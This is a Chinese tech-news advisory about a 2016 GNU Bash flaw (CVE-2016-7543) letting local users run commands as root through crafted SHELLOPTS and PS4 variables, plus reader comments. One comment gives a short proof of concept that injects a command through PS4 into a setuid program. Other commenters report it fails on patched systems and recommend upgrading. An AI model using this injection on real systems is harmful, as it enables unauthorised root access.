漏洞预警 GNU Bash 本地命令执行漏洞

妩媚的悟空
 妩媚的悟空
发布于 2017年01月23日
收藏 23

近期历史悠久的 GNU Bash 爆出了一个高危漏洞,Bash < 4.4 版本存在安全漏洞,通过构造的 SHELLOPTS、PS4 环境变量,本地用户利用此漏洞可用 root 权限执行任意命令。

官方 CVSS V3 评级为 High,属于高危漏洞,预测当前 90% 以上的 Linux 用户都会受到影响。

http://www.openwall.com/lists/oss-security/2016/09/26/9

小编测试了一下,100% 命中:

各位站长,赶在过年之前快动起来吧

本站文章除注明转载外,均为本站原创或编译。欢迎任何形式的转载,但请务必注明出处,尊重他人劳动共创开源社区。
转载请注明:文章转载自 开源中国社区 [http://www.oschina.net]
本文标题:漏洞预警 GNU Bash 本地命令执行漏洞
加载中

精彩评论

妩媚的悟空
妩媚的悟空

引用来自“游客”的评论

妈的智障,谁没事会给程序 4755 的权限。😤
假设,你的web程序有漏洞,然后通过漏洞入侵进去拿到系统普通账号权限,然后进去自己创建文件,然后。。。
ddatsh
ddatsh
ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

最新评论(18

妩媚的悟空
妩媚的悟空

引用来自“桔子”的评论

06年漏洞,现在发出来搞毛,脑子被驴踢了把
回复@桔子 : 漏洞有发现时间、公布时间和更新时间,06年9月发现,但是直到19号才公开,具体参见NVD链接:https://web.nvd.nist.gov/view/vuln/detail?spm=5176.7750219.2.4.3GmKFD&vulnId=CVE-2016-7543
桔子
桔子
06年漏洞,现在发出来搞毛,脑子被驴踢了把
妩媚的悟空
妩媚的悟空

引用来自“游客”的评论

妈的智障,谁没事会给程序 4755 的权限。😤

引用来自“妩媚的悟空”的评论

假设,你的web程序有漏洞,然后通过漏洞入侵进去拿到系统普通账号权限,然后进去自己创建文件,然后。。。

引用来自“li_Zero”的评论

可是你普通用户创建的文件用如上方法能也拿不到权闲呀,只有root的4755才有效呀
回复@li_Zero : 只要suid程序调用system/popen就会有问题,那个setuid调用只是用来演示
l
li_Zero

引用来自“游客”的评论

妈的智障,谁没事会给程序 4755 的权限。😤

引用来自“妩媚的悟空”的评论

假设,你的web程序有漏洞,然后通过漏洞入侵进去拿到系统普通账号权限,然后进去自己创建文件,然后。。。
可是你普通用户创建的文件用如上方法能也拿不到权闲呀,只有root的4755才有效呀
1899
1899
有已经受波及的没。。
ideal_github_harbby
ideal_github_harbby
已经亲测可行......😅
eechen
eechen

引用来自“ddatsh”的评论

ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

引用来自“eechen”的评论

Ubuntu 14.04 LTS, Bash 4.3 同样提示 Permission denied 并没有root权限.

引用来自“ddatsh”的评论

所以特别鄙视这种标题很大,实际带不给我幸福感的文
不知道,可能是漏洞已经修复了,毕竟这个漏洞是2016/09/26去年的.
执行过sudo apt-get upgrade软件升级的可能都已经修复了.
所以还是建议大家upgrade一下软件:
sudo apt-get update 刷新软件列表
sudo apt-get upgrade 升级软件
sudo apt-get install bash 只升级bash
sudo shutdown -r now 重启生效
ddatsh
ddatsh

引用来自“ddatsh”的评论

ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

引用来自“eechen”的评论

Ubuntu 14.04 LTS, Bash 4.3 同样提示 Permission denied 并没有root权限.
所以特别鄙视这种标题很大,实际带不给我幸福感的文
eechen
eechen

引用来自“ddatsh”的评论

ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

Ubuntu 14.04 LTS, Bash 4.3 同样提示 Permission denied 并没有root权限.
返回顶部
顶部